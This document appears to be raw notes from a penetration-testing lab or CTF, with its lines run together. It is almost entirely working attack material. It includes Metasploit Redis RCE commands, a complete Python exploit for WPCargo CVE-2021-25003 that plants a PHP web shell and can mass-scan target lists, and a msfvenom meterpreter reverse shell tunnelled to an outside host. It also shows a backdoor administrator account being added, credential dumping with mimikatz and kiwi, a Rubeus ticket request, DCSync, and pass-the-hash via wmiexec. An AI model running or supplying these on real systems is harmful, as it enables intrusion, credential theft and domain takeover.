use exploit/linux/redis/redis_replication_cmd_execset RHOSTS 47.92.135.138set SRVHOST VPS_IPset LHOST VPS_IPexploit

find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} ;

base64 "/home/redis/flag/flag01" | base64 --decode

proxychains wpscan --url http://172.22.2.18

# @author : biulove0x# @name   : WP Plugins WPCargo Exploiter
## This is a magic string that when treated as pixels and compressed using the png## algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file## payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'## def encode_character_code(c: int):##     return '{:08b}'.format(c).replace('0', 'x')## text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]
# References : https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a
from urllib3.exceptions import InsecureRequestWarningimport concurrent.futuresimport requests, re, argparse
print('''############################################# @author : biulove0x                      ## @name   : WP Plugins WPCargo Exploiter   ## @cve    : CVE-2021-25003                 #############################################''')
def wpcargo(_target, _timeout=5):    _payload  = 'x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx'    _endpoint = 'wp-content/plugins/wpcargo/includes/barcode.php?text='+ _payload +'&sizefactor=.090909090909&size=1&filepath=../../../wp-conf.php'    _sessionget = requests.Session()    _headers = {        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36'    }    def save_result(_result):        _saved = open('RESULT-WPCRGO.txt', 'a+')        _saved.write(_result + 'n')
    try:        _sessionget.get(url=_target + _endpoint, headers=_headers, allow_redirects=True, timeout=_timeout)        _validationshell = _sessionget.post(url=_target + 'wp-content/wp-conf.php?1=system', headers=_headers, allow_redirects=True, data={"2": "cat /etc/passwd"}, timeout=_timeout)
        if 'root:x:0:0:root' in _validationshell.text:            print('[-] ' + _target + 'wp-content/wp-conf.php => Uploaded!')            save_result(_target + 'wp-content/wp-conf.php?1=system')        else:            print('[+] ' + _target + ' Not found!')    except:        print('[%] ' + _target + ' Requests failed')
def main(_choose, _target):    if _choose == 1:        wpcargo(_target)
    elif _choose == 2:        with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:            _ur_list = open(_target, 'r').read().split()            _futures = []
            for _url in _ur_list:                _futures.append(executor.submit(wpcargo, _target=_url))
            for _future in concurrent.futures.as_completed(_futures):                if(_future.result() is not None):                    print(_future.result())    else:        exit()
## SSL Bypassrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)
## Setup args_parser = argparse.ArgumentParser(description='CVE-2021-25003 [ WPCargo < 6.9.0 - Unauthenticated RCE ]')_parser.add_argument('-t', metavar='example.com', type=str, help='Single target')_parser.add_argument('-l', metavar='target.txt', type=str, help='Multiple target')_args = _parser.parse_args()
## Variable args_singleTarget = _args.t_multiTarget  = _args.l
if __name__ == '__main__':    if not _singleTarget == None:        _choose = 1        main(_choose, _singleTarget)    elif not _multiTarget == None:        _choose = 2        main(_choose, _multiTarget)    else:        print('WpCargo.py --help for using tools')

http://172.22.2.18/wp-content/wp-conf.php?1=system
POST:2=whoami

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.22.2.7 LPORT=1080 -f exe > exp.exe

msf6 > use exploit/multi/handlermsf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set LHOST VPS_IPmsf6 exploit(multi/handler) > set LPORT 4444

./tcptunnel --local-port=1080 --remote-port=4444 --remote-host=123.56.220.163 --fork --buffer-size=8192 --stay-alive

net user dawn P@ssw0rd /addnet localgroup administrators dawn /add

meterpreter > load kiwimeterpreter > creds_all

Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:cea3e66a2715c71423e7d3f0ff6cd352 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

python wmiexec.py -hashes 00000000000000000000000000000000:1a19251fbd935969832616366ae3fe62 [email protected]